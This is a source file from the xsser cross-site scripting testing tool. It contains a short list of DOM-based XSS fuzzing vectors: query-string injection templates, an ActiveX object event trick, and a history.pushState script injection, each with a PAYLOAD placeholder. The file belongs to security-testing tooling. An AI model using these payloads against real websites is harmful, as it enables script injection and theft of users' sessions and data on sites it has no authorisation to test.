DOM.py 1.7 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. # vim: set expandtab tabstop=4 shiftwidth=4:
  4. """
  5. $Id$
  6. This file is part of the xsser project, http://xsser.03c8.net
  7. Copyright (c) 2011/2016 psy <epsylon@riseup.net>
  8. xsser is free software; you can redistribute it and/or modify it under
  9. the terms of the GNU General Public License as published by the Free
  10. Software Foundation version 3 of the License.
  11. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
  12. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  13. FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
  14. details.
  15. You should have received a copy of the GNU General Public License along
  16. with xsser; if not, write to the Free Software Foundation, Inc., 51
  17. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  18. """
  19. ## This file contains different XSS fuzzing vectors.
  20. ## If you have some new, please email me to [epsylon@riseup.net]
  21. ## Happy Cross Hacking! ;)
  22. DOMvectors = [
  23. { 'payload' : """?notname=PAYLOAD""",
  24. 'browser' : """[Document Object Model Injection]"""},
  25. { 'payload' : """?notname=PAYLOAD&""",
  26. 'browser' : """[Document Object Model Injection]"""},
  27. { 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
  28. 'browser' : """[Document Object Model Injection]"""},
  29. { 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
  30. 'browser' : """[Document Object Model Injection]"""},
  31. { 'payload' : """?foobar=name=PAYLOAD&""",
  32. 'browser' : """[Document Object Model Injection]"""}
  33. ]